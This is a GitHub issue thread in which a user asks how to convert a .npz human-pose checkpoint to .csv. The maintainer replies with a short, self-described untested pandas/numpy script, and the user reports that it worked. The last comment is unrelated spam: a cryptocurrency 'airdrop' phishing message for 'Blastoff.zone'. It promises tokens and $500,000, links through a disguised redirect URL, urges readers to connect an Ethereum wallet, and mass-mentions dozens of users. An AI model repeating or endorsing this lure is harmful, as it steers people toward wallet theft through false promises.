### ISSUE TITLE
Readme plz!~

### ISSUE THREAD

**Issue by RvMe** [ptxd/convergence#1]
thank for your work !
I really need this program to transfer .npz (human pose 3Dcheck point) to .csv (Ubuntu)
plz write a simple readme.md to teach us !~
Thx!  :+1:

**Comment by ptxd** [comment]
@RvMe 
I really couldn't commit to finish this package but will return to it this weekend to see if I can make some progress on it. Best way would be to use pandas + numpy

Here is a script that might help (haven't tested the script yet but it should support a multiple arrays):

import numpy as np
import pandas as pd

with np.load('data.npz') as data:

    keys = data.files
    df = pd.DataFrame()
    
    for key in keys:
        arr = data[key]
        
        # Convert each array to a dataframe and append to the main dataframe
        temp_df = pd.DataFrame(arr)
        df = pd.concat([df, temp_df], axis=1)

# Save dataframe to csv
df.to_csv('data.csv', index=False)

**Comment by RvMe** [comment]
So good!~ Now I finish my project! thank you again!~

**Comment by ptxd** [comment]
Glad that worked out :)

**Comment by schopedotco** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
robertoerd, @jasondewitt, @Aboh09102, @allen7wang, @lifesign, @MasterAnalysis, @sekirocc, @Galantini-L, @diegovillarino, @rahilwazir, @littleweb, @qq534632716, @Sunilrai486, @robertwt7, @shouryade, @simon-schaefer, @dalakatt, @titusz, @lion-guru, @hyusap, @sarthakagrawal927, @AlexCastro142, @rikisantoso, @vadiz, @mouhibmak, @braunswag, @andrewguinn, @defix, @leoliupei, @daniel-getu, @captainChaozi, @drozddddd, @alirnamvar, @simon7073, @youxiaohou, @julienbenjamin, @skyfullofdiamondz, @novboy, @themeaningW, @tomas1433, @November-12, @hectorbee, @a494897331, @xxwn2020, @northDacoder, @khonner, @zhaokefei, @c2s, @bird512, @Salami009
